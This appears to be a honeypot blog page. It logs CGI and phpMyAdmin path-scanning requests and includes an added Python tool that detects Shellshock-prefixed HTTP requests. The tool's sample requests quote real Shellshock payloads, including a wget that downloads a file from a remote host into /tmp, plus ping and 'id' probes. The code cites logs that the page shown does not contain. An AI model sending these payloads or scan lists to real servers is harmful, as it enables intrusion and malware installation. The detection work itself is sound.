GET /cgi-bin/mt/mt-load.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0
GET /cgi-bin/musicqueue.cgi HTTP/1.0
GET /cgi-bin/myguestbook.cgi HTTP/1.0
GET /cgi-bin/.namazu.cgi HTTP/1.0
GET /cgi-bin/netauth.cgi HTTP/1.0
GET /cgi-bin/netpad.cgi HTTP/1.0
GET /cgi-bin/newsdesk.cgi HTTP/1.0
GET /cgi-bin/nlog-smb.cgi HTTP/1.0
GET /cgi-bin/nph-emumail.cgi HTTP/1.0
GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0
GET /cgi-bin/nph-publish.cgi HTTP/1.0
GET /cgi-bin/nph-test.cgi HTTP/1.0
GET /cgi-bin/pagelog.cgi HTTP/1.0
GET /cgi-bin/pbcgi.cgi HTTP/1.0
GET /cgi-bin/perlshop.cgi HTTP/1.0
GET /cgi-bin/pfdispaly.cgi HTTP/1.0
GET /cgi-bin/pfdisplay.cgi HTTP/1.0
GET /cgi-bin/phf.cgi HTTP/1.0
GET /cgi-bin/photo/manage.cgi HTTP/1.0
GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0
GET /cgi-bin/php HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php4 HTTP/1.0
GET /cgi-bin/php4.cgi HTTP/1.0
GET /cgi-bin/php5.cgi HTTP/1.0
GET /cgi-bin/php5 HTTP/1.0
GET /cgi-bin/php5? HTTP/1.0
GET /cgi-bin/php5-cgi HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.0
GET /cgi-bin/php-cgi HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php-cgi.bin HTTP/1.0
GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0
GET /cgi-bin/pollssi.cgi HTTP/1.0
GET /cgi-bin/postcards.cgi HTTP/1.0
GET /cgi-bin/powerup/r.cgi HTTP/1.0
GET /cgi-bin/printenv HTTP/1.0
GET /cgi-bin/probecontrol.cgi HTTP/1.0
GET /cgi-bin/profile.cgi HTTP/1.0
GET /cgi-bin/publisher/search.cgi HTTP/1.0
GET /cgi-bin/quickstore.cgi HTTP/1.0
GET /cgi-bin/quizme.cgi HTTP/1.0
GET /cgi-bin/ratlog.cgi HTTP/1.0
GET /cgi-bin/r.cgi HTTP/1.0
GET /cgi-bin/recent.cgi HTTP/1.0
GET /cgi-bin/register.cgi HTTP/1.0
GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0
GET /cgi-bin/responder.cgi HTTP/1.0
GET /cgi-bin/robadmin.cgi HTTP/1.0
GET /cgi-bin/robpoll.cgi HTTP/1.0
GET /cgi-bin/sat-ir-web.pl HTTP/1.0
GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0
GET /cgi-bin/scoadminreg.cgi HTTP/1.0
GET /cgi-bin-sdb/printenv HTTP/1.0
GET /cgi-bin/search HTTP/1.0
GET /cgi-bin/search.cgi HTTP/1.0
GET /cgi-bin/search/search.cgi HTTP/1.0
GET /cgi-bin/sendform.cgi HTTP/1.0
GET /cgi-bin/shop.cgi HTTP/1.0
GET /cgi-bin/shopper.cgi HTTP/1.0
GET /cgi-bin/shopplus.cgi HTTP/1.0
GET /cgi-bin/showcheckins.cgi HTTP/1.0
GET /cgi-bin/signon.cgi HTTP/1.0
GET /cgi-bin/simplestguest.cgi HTTP/1.0
GET /cgi-bin/simplestmail.cgi HTTP/1.0
GET /cgi-bin/smartsearch.cgi HTTP/1.0
GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0
GET /cgi-bin/snorkerz.bat HTTP/1.0
GET /cgi-bin/snorkerz.cmd HTTP/1.0
GET /cgi-bin/sojourn.cgi HTTP/1.0
GET /cgi-bin/spin_client.cgi HTTP/1.0
GET /cgi-bin/start.cgi HTTP/1.0
GET /cgi-bin/status HTTP/1.0
GET /cgi-bin/status/status.cgi HTTP/1.0
GET /cgi-bin/store/agora.cgi HTTP/1.0
GET /cgi-bin/store.cgi HTTP/1.0
GET /cgi-bin/store/index.cgi HTTP/1.0
GET /cgi-bin/survey.cgi HTTP/1.0
GET /cgi-bin/talkback.cgi HTTP/1.0
GET /cgi-bin/technote/main.cgi HTTP/1.0
GET /cgi-bin/test2.pl HTTP/1.0
GET /cgi-bin/test-cgi HTTP/1.0
GET /cgi-bin/test.cgi HTTP/1.0
GET /cgi-bin/test-cgi.pl HTTP/1.0
GET /cgi-bin/testing_whatever HTTP/1.0
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-bin/test/test.cgi HTTP/1.0
GET /cgi-bin/tidfinder.cgi HTTP/1.0
GET /cgi-bin/tigvote.cgi HTTP/1.0
GET /cgi-bin/title.cgi HTTP/1.0
GET /cgi-bin/tools/tools.pl HTTP/1.0
GET /cgi-bin/traffic.cgi HTTP/1.0
GET /cgi-bin/tree.php HTTP/1.0
GET /cgi-bin/troops.cgi HTTP/1.0
GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0
GET /cgi-bin/ultraboard.cgi HTTP/1.0
GET /cgi-bin/upload.cgi HTTP/1.0
GET /cgi-bin/urlcount.cgi HTTP/1.0
GET /cgi-bin/viewcvs.cgi HTTP/1.0
GET /cgi-bin/viralator.cgi HTTP/1.0
GET /cgi-bin/virgil.cgi HTTP/1.0
GET /cgi-bin/vote.cgi HTTP/1.0
GET /cgi-bin/vpasswd.cgi HTTP/1.0
GET /cgi-bin/w3mman2html.cgi HTTP/1.0
GET /cgi-bin/way-board.cgi HTTP/1.0
GET /cgi-bin/way-board/way-board.cgi HTTP/1.0
GET /cgi-bin/webbbs.cgi HTTP/1.0
GET /cgi-bin/webcart/webcart.cgi HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/webif.cgi HTTP/1.0
GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0
GET /cgi-bin/webmap.cgi HTTP/1.0
GET /cgi-bin/webspirs.cgi HTTP/1.0
GET /cgi-bin/whois.cgi HTTP/1.0
GET /cgi-bin/whois_raw.cgi HTTP/1.0
GET /cgi-bin/whois/whois.cgi HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /cgi-bin/wrap.cgi HTTP/1.0
GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0
GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0
GET /cgi-bin/zml.cgi HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.0
GET /cgistart HTTP/1.0
GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0
GET /cgi-sys/addalink.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/domainredirect.cgi HTTP/1.0
GET /cgi-sys/entropybanner.cgi HTTP/1.0
GET /cgi-sys/entropysearch.cgi HTTP/1.0
GET /cgi-sys/FormMail-clone.cgi HTTP/1.0
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/helpdesk.cgi HTTP/1.0
GET /cgi-sys/mchat.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.0
GET /cgi-sys/randhtml.cgi HTTP/1.0
GET /cgi-sys/realhelpdesk.cgi HTTP/1.0
GET /cgi-sys/realsignup.cgi HTTP/1.0
GET /cgi-sys/signup.cgi HTTP/1.0
GET /cgi-sys/suspendedpage.cgi HTTP/1.0
GET /connector.cgi HTTP/1.0
GET /cp/rac/nsManager.cgi HTTP/1.0
GET /create_release.sh HTTP/1.0
GET /CSNews.cgi HTTP/1.0
GET /csPassword.cgi HTTP/1.0
GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0
GET /dcadmin.cgi HTTP/1.0
GET /dcboard.cgi HTTP/1.0
GET /dcforum.cgi HTTP/1.0
GET /dcforum/dcforum.cgi HTTP/1.0
GET /debug.cgi HTTP/1.0
GET /details.cgi HTTP/1.0
GET /download.cgi HTTP/1.0
GET /edittag/edittag.cgi HTTP/1.0
GET /emumail.cgi HTTP/1.0
GET /enter_bug.cgi HTTP/1.0
GET /ez2000/ezadmin.cgi HTTP/1.0
GET /ez2000/ezboard.cgi HTTP/1.0
GET /ez2000/ezman.cgi HTTP/1.0
GET /fcgi-bin/echo HTTP/1.0
GET /fcgi-bin/echo2 HTTP/1.0
GET /gitweb/ HTTP/1.0
GET /gitweb.cgi HTTP/1.0
GET /gitweb/gitweb.cgi HTTP/1.0
GET /Gozila.cgi HTTP/1.0
GET /hitmatic/analyse.cgi HTTP/1.0
GET /hndUnblock.cgi HTTP/1.0
GET /html/cgi-bin/cgicso HTTP/1.0
GET /index.cgi HTTP/1.0
GET /info.cgi HTTP/1.0
GET /infosrch.cgi HTTP/1.0
GET /left.cgi HTTP/1.0
GET /login.cgi HTTP/1.0
GET /mailview.cgi HTTP/1.0
GET /main.cgi HTTP/1.0
GET /megabook/admin.cgi HTTP/1.0
GET /ministats/admin.cgi HTTP/1.0
GET /mods/apage/apage.cgi HTTP/1.0
GET /_mt/mt.cgi HTTP/1.0
GET /musicqueue.cgi HTTP/1.0
GET /ncbook.cgi HTTP/1.0
GET /newpro.cgi HTTP/1.0
GET /newsletter.sh HTTP/1.0
GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0
GET /page.cgi HTTP/1.0
GET /parse_xml.cgi HTTP/1.0
GET /photodata/manage.cgi HTTP/1.0
GET /photo/manage.cgi HTTP/1.0
GET /phppath/cgi_wrapper HTTP/1.0
GET /phppath/cgi_wrapper? HTTP/1.0
GET /phppath/php HTTP/1.0
GET /phppath/php? HTTP/1.0
GET /print.cgi HTTP/1.0
GET /process_bug.cgi HTTP/1.0
GET /pub/english.cgi HTTP/1.0
GET /quikmail/nph-emumail.cgi HTTP/1.0
GET /quikstore.cgi HTTP/1.0
GET /redirects/redir.cgi HTTP/1.0
GET /reviews/newpro.cgi HTTP/1.0
GET /ROADS/cgi-bin/search.pl HTTP/1.0
GET /sample01.cgi HTTP/1.0
GET /sample02.cgi HTTP/1.0
GET /sample03.cgi HTTP/1.0
GET /sample04.cgi HTTP/1.0
GET /sampleposteddata.cgi HTTP/1.0
GET /scancfg.cgi HTTP/1.0
GET /servers/link.cgi HTTP/1.0
GET /setpasswd.cgi HTTP/1.0
GET /SetSecurity.shm HTTP/1.0
GET /shop/member_html.cgi HTTP/1.0
GET /shop/normal_html.cgi HTTP/1.0
GET /site_searcher.cgi HTTP/1.0
GET /siteUserMod.cgi HTTP/1.0
GET /submit.cgi HTTP/1.0
GET /sys-cgi HTTP/1.0
GET /technote/print.cgi HTTP/1.0
GET /template.cgi HTTP/1.0
GET /test.cgi HTTP/1.0
GET /tmUnblock.cgi HTTP/1.0
GET /upload.cgi HTTP/1.0
GET /userreg.cgi HTTP/1.0
GET /users/scripts/submit.cgi HTTP/1.0
GET /Web_Store/web_store.cgi HTTP/1.0
GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvslog.cgi HTTP/1.0
GET /webtools/bonsai/cvsquery.cgi HTTP/1.0
GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0
GET /webtools/bonsai/showcheckins.cgi HTTP/1.0
GET /wwwadmin.cgi HTTP/1.0
GET /wwwboard.cgi HTTP/1.0
GET /wwwboard/wwwboard.cgi HTTP/1.0
GET /xul/ HTTP/1.0
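
The ChinaZ request (61.161.130.241), the Cookie ping (46.172.71.251) and the `expr 1330 + 7` probe (195.141.90.114) logged on this page all carry the same `() { :; };` Bash function-definition prefix, in different parts of the request. The following Python is an added example, not the blog author's tooling: it checks the request target and every header for that prefix, extracts the command that follows it, and pulls out the hosts the command refers to. The sample requests are copied or abridged from the logs above, the 192.0.2.10 request is constructed, and all function names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# "() {" with optional whitespace, as in "() { :; };" and "() { :;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s;\"'>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def split_request(raw):
    """Return (decoded request target, [(header name, value), ...])."""
    lines = raw.strip("\n").splitlines()
    _method, _, rest = lines[0].partition(" ")
    # The target may itself contain spaces, so cut at the last " HTTP/".
    target = rest.rsplit(" HTTP/", 1)[0]
    headers = []
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return unquote(target), headers


def find_shellshock(raw):
    """One finding per request field that carries the function prefix."""
    target, headers = split_request(raw)
    findings = []
    for where, value in [("request-target", target)] + headers:
        match = SHELLSHOCK_RE.search(value)
        if not match:
            continue
        # Whatever follows the closing brace of the dummy function body
        # is the command the sender wants executed.
        close = value.find("}", match.end())
        command = value[close + 1:].lstrip("; ").rstrip() if close != -1 else ""
        findings.append({
            "where": where,
            "command": command,
            "urls": sorted(set(URL_RE.findall(command))),
            "ips": sorted(set(IPV4_RE.findall(command))),
        })
    return findings


def triage(events):
    """events: iterable of (source_ip, raw_request) -> {source_ip: report}."""
    report = {}
    for src, raw in events:
        hits = find_shellshock(raw)
        if hits:
            report[src] = {
                "fields": [h["where"] for h in hits],
                "commands": sorted({h["command"] for h in hits}),
                # Hosts named in the command other than the sender itself.
                "callback_ips": sorted({ip for h in hits for ip in h["ips"]} - {src}),
            }
    return report


# Abridged from the 30 September request (one echo line of the payload kept).
CHINAZ = r'''GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh"
Connection:Keep-Alive
'''
# Copied from the 21 September request.
PING = r'''GET /rom-0 HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Cookie: () { :;}; /bin/bash -c "ping 212.47.238.143 -c 1"
Connection: close
'''
# Copied from the 14 September request.
EXPR = r'''GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @ HTTP/1.0
Host: oc.johest.de
Cookie: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
User-Agent: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
Referer: () { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;id;echo @
'''
# Constructed benign request (documentation address range).
BENIGN = r'''GET /index.html HTTP/1.1
Host: 109.234.106.8
User-Agent: Mozilla/5.0
'''
EVENTS = [("61.161.130.241", CHINAZ), ("46.172.71.251", PING),
          ("195.141.90.114", EXPR), ("192.0.2.10", BENIGN)]

if __name__ == "__main__":
    for src, info in triage(EVENTS).items():
        print(src, info["fields"], info["callback_ips"])
```
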

Wednesday, 9 September 2015

Checking Database config - 202.137.205.134

BEGIN OF HTTP DATA:
2015-09-09 01:48:57
Source IP: 202.137.205.134
Country: AU RiskScore: 1 Malware: []
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
User-Agent: Mozilla/5.0 Jorgee
Host: 195.169.125.87
The IP made several attempts to reach database-related admin consoles.
So, time to show the new tool :-)
 python.exe .\spider.py -i 202.137.205.134
<?xml version="1.0" encoding="UTF-8"?>
<ip>202.137.205.134
<reporter>SANS Internet Storm Cast</reporter>
<comment>IP is listed on SANS ISC</comment>
<reference>https://isc.sans.edu/api/ip/202.137.205.134</reference>
</reporter>
</ip>
HEAD http://195.169.125.87:80/1phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/2phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/3phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/4phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/MyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2012/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2013/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2014/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2015/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/db/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sysadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/web/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/db/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/web/ HTTP/1.1
HEAD http://195.169.125.87:80/database/ HTTP/1.1
HEAD http://195.169.125.87:80/db/ HTTP/1.1
HEAD http://195.169.125.87:80/db/db-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbweb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadminphp/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/db/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/sqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/web/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/php-my-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin1/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phppma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2011/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2012/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2013/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2014/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2015/ HTTP/1.1
HEAD http://195.169.125.87:80/program/ HTTP/1.1
HEAD http://195.169.125.87:80/shopdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqlweb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/sqlmanager/ HTTP/1.1